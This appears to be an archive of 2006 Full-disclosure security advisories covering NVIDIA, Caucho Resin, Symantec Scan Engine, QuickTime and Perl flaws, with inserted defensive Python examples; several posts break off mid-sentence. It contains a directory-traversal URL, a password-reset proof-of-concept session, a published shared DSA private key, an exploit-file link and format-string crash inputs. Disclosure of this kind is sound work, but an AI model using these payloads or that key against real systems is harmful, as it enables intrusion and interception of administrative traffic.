   http://www.nvidia.com

   There have been multiple public reports of this NVIDIA bug on the
   NVNews forum [1,2] and elsewhere, dating back to 2004 [3]. NVIDIA's
   first public acknowledgement of this bug was on July 7th, 2006. In a
   public posting [1] on the NVNews forum, an NVIDIA employee reported
   having reproduced the problem, assigned it bug ID 239065, and promised
   a fix would be forthcoming.

   As of the publication date, the latest NVIDIA binary driver is still
   vulnerable. Furthermore, it is our opinion that NVIDIA's binary driver
   remains an unacceptable security risk based on the large numbers of
   reproducible, unfixed crashes that have been reported in public forums
   and bug databases. This number does not include bugs reported directly
   to NVIDIA.

   1. http://www.nvnews.net/vbulletin/showthread.php?p=931048        (Jul 2006)
   2. http://www.nvnews.net/vbulletin/showthread.php?t=76493         (Sep 2006)
   3. https://bugs.freedesktop.org/show_bug.cgi?id=2129              (Dec 2004)
   4. http://lists.freedesktop.org/archives/xorg/2005-January/005642.html
   5. http://forums.gentoo.org/viewtopic.php?t=282107                (Jan 2005)
   6. https://bugs.eclipse.org/bugs/show_bug.cgi?id=87299            (Mar 2005)
   7. http://www.nvnews.net/vbulletin/showthread.php?t=76206         (Sep 2006)

4. Solution

   Disable the binary blob driver and use the open-source nv driver
   that is included by default with X.

5. Detailed analysis

   There are two NVIDIA graphics drivers for Linux: a closed-source
   binary blob driver provided by NVIDIA (which provides acceleration)
   and an open-source driver (which lacks acceleration). NVIDIA's
   binary blob driver contains an error in its accelerated rendering
   of glyphs (text character data) that can be exploited to write
   arbitrary data to anywhere in memory. The open-source driver is
   not vulnerable.

   The XRender extension provides a client function named
   XRenderCompositeString8 which tells the X server to render glyphs
   onto the screen. This request is processed by the server's
   ProcRenderCompositeGlyphs function. This function pulls the glyphs
   out of the render request, constructs a glyph list, and then calls
   into the graphics driver via a registered callback function.

   The NVIDIA binary blob driver registers a function named _nv000373X.
   This function calculates a bounding BoxRec of the total area occupied
   by the glyph data. It then uses Xalloc to allocate a buffer large
   enough to hold the data by multiplying width * height. This buffer
   is then passed to another internal function called _nv53X.

   The _nv53X function iterates over the glyph list and copies
   glyph data into the buffer using each glyph's accumulated width,
   xOff, height, and yOff values to calculate the destination position
   in the buffer. The NVIDIA binary blob driver does not check this
   calculation against the size of the allocated buffer. As a result,
   a short sequence of user-supplied glyphs can be used to trick the
   function into writing to an arbitrary location in memory.
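   Added example, not NVIDIA's or Rapid7's code, that models the arithmetic
   described above in Python: a bounding box computed from the glyph list sizes
   a width*height buffer, and each glyph is then placed at an accumulated
   (xOff, yOff) position. The unchecked loop is exposed as the list of pixel
   coordinates it would write, and the checked placement refuses any
   destination outside the allocation instead of writing there. The glyph
   records are constructed.

```python
"""Bounds-checking glyph placement against an allocated staging buffer.

Added example, not NVIDIA's or Rapid7's code. The size computation and the
placement loop use the same accumulated-offset arithmetic, and the check
that is missing in the advisory's description is the one in place_glyphs().
"""
from collections import namedtuple

# Constructed glyph record: pixel size plus the advance applied after drawing it.
Glyph = namedtuple("Glyph", "width height x_off y_off")


class OutOfBounds(Exception):
    """Raised instead of writing outside the staging buffer."""


def bounding_box(glyphs):
    """Extent covered when the glyphs are drawn from the origin with
    accumulated offsets. Measured from (0, 0) only, so a glyph advanced to a
    negative coordinate is not accounted for; that mismatch between the
    allocation and the placement is what the check below has to catch."""
    x = y = 0
    max_x = max_y = 0
    for g in glyphs:
        max_x = max(max_x, x + g.width)
        max_y = max(max_y, y + g.height)
        x += g.x_off
        y += g.y_off
    return max_x, max_y


def pixel_targets(glyphs):
    """Yield (glyph index, dx, dy) for every pixel the placement loop writes."""
    x = y = 0
    for n, g in enumerate(glyphs):
        for row in range(g.height):
            for col in range(g.width):
                yield n, x + col, y + row
        x += g.x_off
        y += g.y_off


def out_of_bounds(glyphs):
    """Every target the unchecked loop would write outside width*height.
    An empty list means the glyph list is safe to render."""
    width, height = bounding_box(glyphs)
    return [(n, dx, dy) for n, dx, dy in pixel_targets(glyphs)
            if not (0 <= dx < width and 0 <= dy < height)]


def place_glyphs(glyphs) -> bytearray:
    """Checked placement: allocate width*height, then write each pixel only
    after confirming its destination lies inside the allocation."""
    width, height = bounding_box(glyphs)
    buf = bytearray(width * height)
    for n, dx, dy in pixel_targets(glyphs):
        if not (0 <= dx < width and 0 <= dy < height):
            raise OutOfBounds("glyph %d writes at (%d,%d); buffer is %dx%d"
                              % (n, dx, dy, width, height))
        buf[dy * width + dx] = 0xFF
    return buf


def placement_ok(glyphs) -> bool:
    try:
        place_glyphs(glyphs)
        return True
    except OutOfBounds:
        return False


# Constructed inputs: a benign run of two glyphs, and one whose second glyph
# is advanced to a negative x. In C the index dy*width+dx for that glyph is
# negative, i.e. a write before the start of the allocation.
BENIGN = [Glyph(4, 4, 5, 0), Glyph(4, 4, 0, 0)]
HOSTILE = [Glyph(4, 4, -6, 0), Glyph(4, 4, 0, 0)]
```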

   It is important to note that glyph data is supplied to the X server
   by the X client. Any remote X client can gain root privileges on
   the X server using the proof of concept program attached.

   It is also trivial to exploit this vulnerability as a DoS by causing
   an existing X client program (such as Firefox) to render a long text
   string. It may be possible to use Flash movies, Java applets, or
   embedded web fonts to supply the custom glyph data necessary for
   reliable remote code execution.

   A simple HTML page containing an INPUT field with a long value is
   sufficient to demonstrate

[Full-disclosure] Caucho Resin Windows Directory Traversal Vulnerability

2006-05-16 Thread advisory
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0024
Caucho Resin Windows Directory Traversal Vulnerability

   Published:  May 16, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0024.html

   CVE:CVE-2006-1953

1. Affected system(s):

   KNOWN VULNERABLE:
o Caucho Resin v3.0.18 for Windows
o Caucho Resin v3.0.17 for Windows

   NOT VULNERABLE:
o Caucho Resin v3.0.19
o Caucho Resin v3.0.16 and earlier

2. Summary

   The Caucho Resin web application server for Windows contains a
   directory traversal vulnerability that allows remote
   unauthenticated users to download any file from the system. It is
   possible to download files from any drive on the system.

   Rapid7 have updated NeXpose to check for this vulnerability. Licensed
   customers will receive the new vulnerability checks automatically.
   Visit http://www.rapid7.com to register for a free demo of NeXpose.

3. Vendor status and information

   Caucho Technology, Inc.
   http://www.caucho.com/

   Caucho was notified of this vulnerability on April 20th, 2006.
   They fixed this vulnerability in the latest unofficial snapshot
   of Resin 3.0.19, available from Caucho's website.

4. Solution

   Upgrade to the latest snapshot version of Resin, version 3.0.19.

5. Detailed analysis

   Caucho Resin is a servlet and JSP server. Resin ships with its own
   standalone web server which runs by default on port 8080. Any remote
   user can request URLs of the form:

  http://victim:8080/C:%5C/

   to access the root of the C: drive (and any files below it). Any
   drive letter can be specified.  Only Resin on Windows is vulnerable.

   This vulnerability appears to have been introduced in Resin
   version 3.0.17, although this has not been confirmed by the vendor.
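   Added example, not Caucho's code: a resolver that maps a request path onto
   a file under a document root and refuses the decoded form of URLs such as
   /C:%5C/, which becomes C:\ and names an absolute drive path rather than a
   sub-directory. The document root and request paths are constructed values;
   the example uses POSIX path semantics for the join so it runs on any
   platform, and ntpath only to recognise drive specifications.

```python
"""Resolving an HTTP request path safely against a document root.

Added example, not Caucho's code. Decode, normalise, then require the
result to stay under the document root; anything else is refused.
"""
import ntpath
import posixpath
from urllib.parse import unquote


class Forbidden(Exception):
    """Raised for a request path that does not denote a file under the root."""


def resolve(doc_root: str, request_path: str) -> str:
    """Map a request path onto a file under doc_root, or raise Forbidden."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        raise Forbidden("NUL byte in path")
    # Treat backslash as a separator so a "C:\" style component is normalised
    # rather than passed through as a literal file-name character.
    decoded = decoded.replace("\\", "/")
    # A drive or UNC specification anywhere at the start of the path, with or
    # without the leading slash the URL gives it, never lies under the root.
    for candidate in (decoded, decoded.lstrip("/")):
        if ntpath.splitdrive(candidate)[0]:
            raise Forbidden("drive or UNC reference in path: %r" % candidate)
    root = posixpath.normpath(doc_root)
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # normpath has collapsed any "..", so a prefix test on the result is
    # sufficient to confine the file to the document root.
    if joined != root and not joined.startswith(root + posixpath.sep):
        raise Forbidden("path escapes document root: %r" % joined)
    return joined


def allowed(doc_root: str, request_path: str) -> bool:
    try:
        resolve(doc_root, request_path)
        return True
    except Forbidden:
        return False


# Constructed document root used by the checks below.
DOC_ROOT = "/srv/www"
```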

6. Contact Information

   Rapid7 Security Advisories
   Email:  [EMAIL PROTECTED]
   Web:http://www.rapid7.com/
   Phone:  +1 (617) 603-0700

7. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2006 Rapid7, LLC.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.



[Full-disclosure] Rapid7 Advisory R7-0021: Symantec Scan Engine Authentication Fundamental Design Error

2006-04-24 Thread advisory
___
 Rapid7, LLC Security Advisory
___

Rapid7 Advisory R7-0021
Symantec Scan Engine Authentication Fundamental Design Error

   Published:  April 21, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0021.html

   CVE: CVE-2006-0230

1. Affected system(s):

   KNOWN VULNERABLE:
o Symantec Scan Engine v5.0.0.24

   KNOWN FIXED:
o Symantec Scan Engine v5.1.0.7

   UNKNOWN (PROBABLY VULNERABLE):
o All v5.0.x.x
o Earlier versions

2. Summary

   Symantec Scan Engine provides a web-based administrative interface
   that is used for managing scanning options and antivirus
   definitions. To access the interface, an administrator must browse
   to it, load a Java applet, and log in with a password.

   However, the authentication mechanism used by Symantec Scan Engine
   contains a fundamental design flaw that allows any remote user to
   gain full administrative access to the server. The server does not
   verify the password entered by the user. The password is only
   verified by the client-side Java applet. Anyone with knowledge of
   the underlying communication mechanism can exercise full control of
   the Scan Engine server simply by posting XML requests to the server
   using its proprietary protocol.

   NeXpose, Rapid7's award-winning vulnerability assessment platform,
   checks for this vulnerability and other vulnerabilities we have
   discovered in Symantec Scan Engine. Visit http://www.rapid7.com
   to register for a free demo of NeXpose.

3. Vendor status and information

   Symantec Corporation
   http://www.symantec.com

   Symantec was notified of this vulnerability on January 17, 2006.
   They acknowledged the vulnerability, then provided us with a
   fixed version. Rapid7's advisory was publicly released on April 21,
   2006.

4. Solution

   Upgrade to Symantec Scan Engine v5.1.0.7 or later.

5. Detailed analysis

   The administrative web interface, which is typically accessible on
   default TCP port 8004, is implemented as a Java applet. Also, an
   additional SSL connection to TCP port 8005 is used by the applet to
   exchange configuration information with the server using a proprietary
   protocol based on XML exchanges. The authentication model used by the
   administrative interface is utterly flawed, because the server trusts
   the client applet to correctly authenticate users. The protocols
   themselves (HTTP on port 8004 and proprietary protocol on port 8005)
   do NOT require client authentication.

   For example, when an administrator user changes his password via the
   administrative interface, the Java applet simply connects to port
   8005 and sends a request to change the administrator password hash.
   No authentication is required. The direct consequence of this is
   that any remote attacker can change the administrator password to a
   password of his choice.

   We have included with this advisory a proof-of-concept Perl script
   which demonstrates this vulnerability
   (see change_scan_engine_pw.pl).

   Here is an example scenario:

   $ ./change_scan_engine_pw.pl --pwd foobar 10.68.4.4
   Old hash: E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF
   New hash: 656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0
   Password successfully set to: 'foobar'
   $ ./change_scan_engine_pw.pl \
   --hash E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF \
   10.68.4.4
   Old hash: 656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0
   New hash: E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF

   The first command resets the administrator password to 'foobar': it
   asks Scan Engine for the current administrator password hash
   (E97B...) for information purpose only (the attack does not actually
   require knowledge of the previous password hash), computes the hash
   corresponding to the new password (6562...), and uploads this new
   hash. The second command just restores the previous password (which
   is unknown) by re-uploading the previous hash (E97B...) to the
   server.

   Note: the 256-bit password hash is computed using the following
   algorithm. First, a random 128-bit salt is chosen. Second, a character
   string is built by concatenating the password string and the
   uppercase hexadecimal representation of the salt. Third, the 128-bit
   MD5 digest of this concatenated string is computed. Finally the
   256-bit password hash is built by concatenating the 128-bit MD5
   digest and the 128-bit salt.

6. Credit

   This vulnerability was discovered by Marc Bevand of Rapid7.

7. Contact Information

   Rapid7, LLC
   Email: [EMAIL PROTECTED]
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
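As an added example (not Rapid7's change_scan_engine_pw.pl and not Symantec's code), the hash scheme the advisory's note describes, MD5(password || HEX(salt)) || salt, implemented alongside the server-side verification step that Scan Engine 5.0 left to the applet: a password-hash update is only accepted after the current password is verified against the stored value. The encoding of the concatenated string as ASCII/UTF-8 and the function names are our assumptions; the one hash constant is copied from the advisory's session above.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# "New hash" printed in the advisory's example session after setting the password 'foobar'.
ADVISORY_NEW_HASH = "656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0"


def make_password_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Build the 256-bit hash the advisory describes: MD5(password || HEX(salt)) || salt.

    Returned as 64 uppercase hex characters: 32 of MD5 digest followed by 32 of salt.
    """
    if salt is None:
        salt = os.urandom(16)                       # random 128-bit salt
    if len(salt) != 16:
        raise ValueError("salt must be 16 bytes")
    salt_hex = salt.hex().upper()
    # Assumption: the password and the hex salt are hashed as their ASCII/UTF-8 bytes.
    digest = hashlib.md5((password + salt_hex).encode("utf-8")).hexdigest().upper()
    return digest + salt_hex


def split_password_hash(stored: str) -> Tuple[str, str]:
    """Split a stored value into (digest_hex, salt_hex); reject anything malformed."""
    stored = stored.upper()
    if len(stored) != 64 or any(c not in "0123456789ABCDEF" for c in stored):
        raise ValueError("malformed password hash")
    return stored[:32], stored[32:]


def verify_password(password: str, stored: str) -> bool:
    """Server-side check: recompute the digest with the stored salt, compare in constant time."""
    digest, salt_hex = split_password_hash(stored)
    expected = hashlib.md5((password + salt_hex).encode("utf-8")).hexdigest().upper()
    return hmac.compare_digest(expected, digest)


def authorize_hash_update(current_password: str, stored: str, new_hash: str) -> str:
    """The step a server must perform before honouring a 'set password hash' request.

    Returns the value to store, or raises PermissionError. The vulnerable server
    skipped this entirely and trusted the applet to have checked the password.
    """
    if not verify_password(current_password, stored):
        raise PermissionError("current password does not match; update rejected")
    split_password_hash(new_hash)                   # also reject malformed replacements
    return new_hash.upper()


def advisory_sample_reproduces() -> bool:
    """True if MD5('foobar' + salt) matches the digest half of the advisory's printed hash."""
    return verify_password("foobar", ADVISORY_NEW_HASH)


if __name__ == "__main__":
    stored = make_password_hash("foobar")
    print("stored:                  ", stored)
    print("verify correct password: ", verify_password("foobar", stored))
    print("verify wrong password:   ", verify_password("foobaz", stored))
    print("advisory hash reproduces:", advisory_sample_reproduces())
```

Two practitioner caveats: even with the server doing the check, a single unsalted-iteration MD5 is a weak password store by current standards, and verification must happen on the request path that carries the change, not in any client component.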

[Full-disclosure] Rapid7 Advisory R7-0022: Symantec Scan Engine Known Immutable DSA Private Key

2006-04-24 Thread advisory
___
 Rapid7, LLC Security Advisory
___

Rapid7 Advisory R7-0022
Symantec Scan Engine Known Immutable DSA Private Key

   Published:  April 21, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0022.html

   CVE: CVE-2006-0231

1. Affected system(s):

   KNOWN VULNERABLE:
o Symantec Scan Engine v5.0.0.24

   KNOWN FIXED:
o Symantec Scan Engine v5.1.0.7

   UNKNOWN (PROBABLY VULNERABLE):
o All v5.0.x.x
o Earlier versions

2. Summary

   Symantec Scan Engine exhibits a vulnerability in the way it
   generates the SSL private key used for protecting communications
   over TCP port 8005. This port is used to exchange sensitive
   configuration and control commands between the server and the
   administrative control application.

   While all data over this port is protected using SSL, Rapid7 has
   found that every installation of Symantec Scan Engine uses the same
   private DSA key. This immutable key cannot be changed by end users
   and can be extracted easily from any installation of this product.

   This design flaw renders the SSL protection useless. A
   man-in-the-middle attacker could easily intercept and decrypt all
   communications between Symantec Scan Engine and an administrative
   client.

   NeXpose, Rapid7's award-winning vulnerability assessment platform,
   checks for this vulnerability and other vulnerabilities we have
   discovered in Symantec Scan Engine. Visit http://www.rapid7.com
   to register for a free demo of NeXpose.

3. Vendor status and information

   Symantec Corporation
   http://www.symantec.com

   Symantec was notified of this vulnerability on January 17, 2006.
   They acknowledged the vulnerability, then provided us with a
   fixed version. Rapid7's advisory was publicly released on April 21,
   2006.

4. Solution

   Upgrade to Symantec Scan Engine v5.1.0.7 or later.

5. Detailed analysis

   Symantec Scan Engine's administrative client exchanges sensitive
   configuration information with the server using a proprietary
   protocol protected by SSL which runs by default on TCP port 8005.
   This built-in SSL server is used, for example, to transmit the
   administrator password hash when changing the password. It is
   crucial for this communication channel to remain private,
   authenticated, and reliable.

   A critical design error has been made in the way SSL protection is
   employed. The use of a particular DSA private key, pre-generated by
   Symantec, is enforced in their SSL server in all tested versions of
   Symantec Scan Engine. End users are offered no way to change the key,
   and the key itself can be relatively easily extracted from any
   installation. The key can be found in the file servers.jar
   (located by default in C:\Program Files\Symantec\Scan Engine),
   which contains a java keystore file com/symantec/jsse/serverKeys
   protected by the password secret. The key entry is stored under
   the alias server and is protected by the password secret.

   This known immutable key renders SSL protection useless since the
   private key is known to anybody (see below for the key in PEM
   format). All Scan Engine installations use the same key. For example,
   attackers can combine ARP or DNS spoofing attacks with the knowledge
   of the private key to conduct man-in-the-middle attacks.

   -BEGIN DSA PRIVATE KEY-
   MIIBuwIBAAKBgQD9f1OBHXUSKVLfSpwu7OTn9hG3UjzvRADDHj+AtlEmaUVdQCJR
   +1k9jVj6v8X1ujD2y5tVbNeBO4AdNG/yZmC3a5lQpaSfn+gEexAiwk+7qdf+t8Yb
   +DtX58aophUPBPuD9tPFHsMCNVQTWhaRMvZ1864rYdcq7/IiAxmd0UgBxwIVAJdg
   UI8VIwvMspK5gqLrhAvwWBz1AoGBAPfhoIXWmz3ey7yrXDa4V7l5lK+7+jrqgvlX
   TAs9B4JnUVlXjrrUWU/mcQcQgYC0SRZxI+hMKBYTt88JMozIpuE8FnqLVHyNKOCj
   rh4rs6Z1kW6jfwv6ITVi8ftiegEkO8yk8b6oUZCJqIPf4VrlnwaSi2ZegHtVJWQB
   TDv+z0kqAoGAE9rKDKa4eOROFXX1/jy7sLH34OGTbTmsqYoEBTJt8DolJkr6L4kf
   SyOzpIhKB440mmXZMQJbXy0WNBCGzPjq6OHpI60KuBTskWAtPBEGE1jiov/7jK9b
   wCt6sTBqo3Ux5ygyjuFQyt89d+qTp9761Z32OvaBq+IJvZYWNM8M/2ECFDLgCI85
   fJtA3mlq9Q1T6U36Kl7x
   -END DSA PRIVATE KEY-

   The private component of this DSA key is X:

   X = 0x32e0088f397c9b40de696af50d53e94dfa2a5ef1

   A tool such as ssldump can be used to confirm the validity of the
   private key as shown above, by manually comparing its public part to
   the DSA public key embedded in the SSL server's certificate
   displayed by ssldump.

6. Credit

   This vulnerability was discovered by Marc Bevand of Rapid7.

7. Contact Information

   Rapid7, LLC
   Email: [EMAIL PROTECTED]
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any
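As an added example (not part of Rapid7's advisory, not Symantec's code, and not the ssldump procedure the advisory suggests), a stand-alone check of the claim above: parse the published PEM with a minimal DER reader, confirm the private component equals the X the advisory states, check that y = g^x mod p so X really belongs to the embedded public key, and expose the public y so it can be compared against the DSA public key pulled out of a server's certificate. The PEM and X constants are copied from the advisory; the parser, function names and fingerprint convention are ours.

```python
import base64
import hashlib
from typing import Dict, Tuple

# The key the advisory publishes as shared by every Scan Engine 5.0 installation.
ADVISORY_DSA_PEM = """\
-----BEGIN DSA PRIVATE KEY-----
MIIBuwIBAAKBgQD9f1OBHXUSKVLfSpwu7OTn9hG3UjzvRADDHj+AtlEmaUVdQCJR
+1k9jVj6v8X1ujD2y5tVbNeBO4AdNG/yZmC3a5lQpaSfn+gEexAiwk+7qdf+t8Yb
+DtX58aophUPBPuD9tPFHsMCNVQTWhaRMvZ1864rYdcq7/IiAxmd0UgBxwIVAJdg
UI8VIwvMspK5gqLrhAvwWBz1AoGBAPfhoIXWmz3ey7yrXDa4V7l5lK+7+jrqgvlX
TAs9B4JnUVlXjrrUWU/mcQcQgYC0SRZxI+hMKBYTt88JMozIpuE8FnqLVHyNKOCj
rh4rs6Z1kW6jfwv6ITVi8ftiegEkO8yk8b6oUZCJqIPf4VrlnwaSi2ZegHtVJWQB
TDv+z0kqAoGAE9rKDKa4eOROFXX1/jy7sLH34OGTbTmsqYoEBTJt8DolJkr6L4kf
SyOzpIhKB440mmXZMQJbXy0WNBCGzPjq6OHpI60KuBTskWAtPBEGE1jiov/7jK9b
wCt6sTBqo3Ux5ygyjuFQyt89d+qTp9761Z32OvaBq+IJvZYWNM8M/2ECFDLgCI85
fJtA3mlq9Q1T6U36Kl7x
-----END DSA PRIVATE KEY-----
"""

# Private component X as stated in the advisory.
ADVISORY_X = 0x32e0088f397c9b40de696af50d53e94dfa2a5ef1


def pem_to_der(pem: str) -> bytes:
    """Strip the armour lines and base64-decode the body."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    body = "".join(ln for ln in lines if ln and not ln.startswith("-----"))
    return base64.b64decode(body, validate=True)


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER tag-length-value starting at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                               # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated DER element")
    return tag, buf[pos:end], end


def parse_dsa_private_key(der: bytes) -> Dict[str, int]:
    """Parse the OpenSSL-style DSA key: SEQUENCE { version, p, q, g, y, x } of INTEGERs."""
    tag, body, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("expected a single top-level SEQUENCE")
    ints = []
    pos = 0
    while pos < len(body):
        t, val, pos = _read_tlv(body, pos)
        if t != 0x02:
            raise ValueError("expected INTEGER")
        ints.append(int.from_bytes(val, "big", signed=True))
    if len(ints) != 6:
        raise ValueError(f"expected 6 INTEGERs, got {len(ints)}")
    return dict(zip(("version", "p", "q", "g", "y", "x"), ints))


def private_key_is_consistent(key: Dict[str, int]) -> bool:
    """y == g^x mod p: the private component belongs to the public key in the same file."""
    return pow(key["g"], key["x"], key["p"]) == key["y"]


def public_y_fingerprint(key: Dict[str, int]) -> str:
    """SHA-256 over y as big-endian bytes. Assumption: the cert side extracts y from the
    server certificate's SubjectPublicKeyInfo and fingerprints it the same way."""
    y = key["y"]
    return hashlib.sha256(y.to_bytes((y.bit_length() + 7) // 8, "big")).hexdigest()


def server_uses_advisory_key(cert_y: int, key: Dict[str, int]) -> bool:
    """True when the DSA public value from a server certificate equals the published key's y."""
    return cert_y == key["y"]


if __name__ == "__main__":
    key = parse_dsa_private_key(pem_to_der(ADVISORY_DSA_PEM))
    print("x matches advisory:", key["x"] == ADVISORY_X)
    print("y == g^x mod p:    ", private_key_is_consistent(key))
    print("public y SHA-256:  ", public_y_fingerprint(key))
```

The defender's use is the last function: a fleet-wide scan that extracts the DSA public value from each Scan Engine certificate and compares it against this y identifies every installation still serving the shared key.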

[Full-disclosure] sendmail stuff

2006-03-23 Thread advisory
If anyone is playing with the sendmail bug stuff, here is what I've gotten thus
far.

http://rapturesecurity.org/jack/exploiting_sendmail.html

If anyone has any luck I would like to hear about it :]

-- 
Jack
- [EMAIL PROTECTED]



[Full-disclosure] [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow

2006-01-11 Thread CIRT.DK Advisory
Title: [CIRT.DK] Apple QuickTime 7.0.3 and earlier - JPG/PICT Buffer Overflow

Apple QuickTime is vulnerable to a buffer overflow in the handling of .JPG/.PICT files.

Read the full advisory at http://www.cirt.dk/advisories/cirt-41-advisory.pdf

CIRT.DK




[Full-disclosure] QUICKTIME vuln: Apple pulls a Microsoft stunt

2006-01-11 Thread CIRT.DK Advisory
Title: QUICKTIME vuln: Apple pulls a Microsoft stunt

Hey there

Just an update: it seems that Apple uses the same developers as Microsoft.

Apple QuickTime is still vulnerable.

Tested on MAC OS X and Windows platforms.

Save the following file and open it with QuickTime: http://www.cirt.dk/tools/exploits/Apple_VS_MS.jpg (you could change the name to Apple_VS_MS.pict).

[Full-disclosure] Perl format string integer wrap vulnerability

2005-12-01 Thread advisory
SUMMARY. perl suffers from an integer wrap overflow inside the explicit
parameter format string functionality; this has been confirmed to be a
vector for remote code execution.

Date Found: September 23, 2005.
Public Release: TBD.
Application:perl
Credit: Jack Louis of Dyad Security

BACKGROUND.  perl is a cross-platform scripting language. for more
details see Perl.org

DESCRIPTION.  Value over INT_MAX(value of I) inside explicit parameter
format string (%I$n) causes integer wrap in the efix (32bit signed
integer) variable inside the function Perl_sv_vcatpvfn (see example 1)
(sv.c:~9360). Allowing for a write value anywhere in memory exploitation
vector (see example 2). Further, heap corruption itself is possible (see
example 3), as are more exotic non-reliable $PC redirection (see example
4). From what we have seen the first exploitation method is the only
valid one. ImmunitySec has found a generic method of controlling the
first condition with a good amount of robustness and success. Perl
itself is not directly vulnerable to remote attacks due to this flaw,
however any perl program with format string vulnerabilities is. The
vulnerability is not limited to DoS (as reported previously) but remote
code execution as well as information leakage and DoS.

IMPACT.  Perl itself is not generally impacted by this vulnerability,
but programs with format string vulnerabilities (Dyad Security has
confirmed that several programs available at this time have this
specific issue) can be vulnerable to remote code execution. Information
about creating a robust generic exploit is forthcoming, so public
knowledge of exploitation methods for this issue is in the cards.

AFFECTED VERSIONS.  Perl 5.9.2 and perl 5.8.6 have been tested and found
to be vulnerable on linux, freebsd, dragonflybsd on the ia32 platform.
It is assumed that a much larger range of software and platforms are
also affected, as the sv.c seems to remain seemingly static over time,
however this is not confirmed.

EXAMPLE 1.  
$ gdb myperl/bin/perl5.8.7
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i686-pc-linux-gnu...Using host libthread_db 
library /lib/tls/libthread_db.so.1.

(gdb) break sv.c:9232
Breakpoint 1 at 0x80c0df0: file sv.c, line 9232.
(gdb) set args -e 'printf(%2147483647\$n);'
(gdb) run

Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x0, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbffb72cb ) at sv.c:9232
9232in sv.c
(gdb) p efix
$1 = 2147483647
(gdb) set args -e 'printf(%2147483648\$n);'
(gdb) run

Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180,
pat=0x8000 Address 0x8000 out of bounds, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbfb0640b ) at sv.c:9232
9232in sv.c
(gdb) p efix
$2 = -2147483648
(gdb) cont
Modification of a read-only value attempted at -e line 1.

Program exited with code 0377.
(gdb) set args -e 'printf(%2147483649\$n);'
(gdb) run

Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180,
pat=0x8001 Address 0x8001 out of bounds, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbfe69b9b ) at sv.c:9232
9232in sv.c
(gdb) p efix
$3 = -2147483647
(gdb) cont

Program received signal SIGSEGV, Segmentation fault.
Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652
1652in sv.c
(gdb) bt
#0  Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652
#1  0x080b6349 in Perl_sv_setuv_mg (sv=0x0, u=0) at sv.c:1743
#2  0x080c0e06 in Perl_sv_vcatpvfn (sv=0x812d180,
pat=0x8001 Address 0x8001 out of bounds, patlen=0, args=0x0, 
svargs=0x8133080,
svmax=0, maybe_tainted=0xbfe69b9b ) at sv.c:9232
#3  0x080e923b in Perl_do_sprintf (sv=0x812d180, len=1, sarg=0x813307c) at 
doop.c:713
#4  0x080de48a in Perl_pp_prtf () at pp_sys.c:1489
#5  0x080ad038 in Perl_runops_standard () at run.c:37
#6  0x080615c7 in S_run_body (oldscope=1) at perl.c:2000
#7  0x080613ff in perl_run (my_perl=0x812d008) at perl.c:1919
#8  0x0805e61f in main (argc=3, argv=0xbfe69da4, env=0xbfe69db4) at 
perlmain.c:98
(gdb) x/i $eip
0x80b61a8 Perl_sv_setiv+8:mov0x8(%ebx),%edx
(gdb) i r ebx edx
ebx0x0  0
edx0x812d180135451008
(gdb)

EXAMPLE 2.  
#0  Perl_sv_setiv (sv=0x815f821, i=0) at sv.c:2184
2184SvIVX(sv) = i;
(gdb) x/i $eip
0x80c815c Perl_sv_setiv+108:  mov%esi,0xc(%eax)

EXAMPLE 3.  
#0  0xb7e69fb0 in malloc_consolidate () from /lib/tls/libc.so.6

EXAMPLE 4.  
#0  0x09010e50 in ?? ()

FIXES.  Due to the information that has already been leaked we moved up
the release date of this advisory. There is no official fix for this
issue as of yet. We have provided a sample patch for the 5.9.2 version.

See http

